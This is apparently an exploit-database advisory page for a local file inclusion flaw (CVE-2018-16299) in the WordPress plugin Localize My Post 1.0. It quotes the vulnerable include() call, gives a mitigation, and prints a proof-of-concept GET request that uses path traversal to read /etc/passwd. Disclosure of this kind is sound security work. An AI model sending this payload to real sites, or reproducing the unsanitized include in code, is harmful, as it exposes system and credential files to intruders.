header-logo
Suggest Exploit
vendor:
Localize My Post
by:
Manuel Garcia Cardenas
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Localize My Post
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: 2018-16299
CPE: a:wordpress:localize_my_post:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

WordPress Plugin Localize My Post 1.0 – Local File Inclusion

This bug was found in the file: /localize-my-post/ajax/include.php include($_REQUEST['file']); The parameter "file" it is not sanitized allowing include local files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

Mitigation:

Sanitize user input and validate the file path before including it.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299

# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

# Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR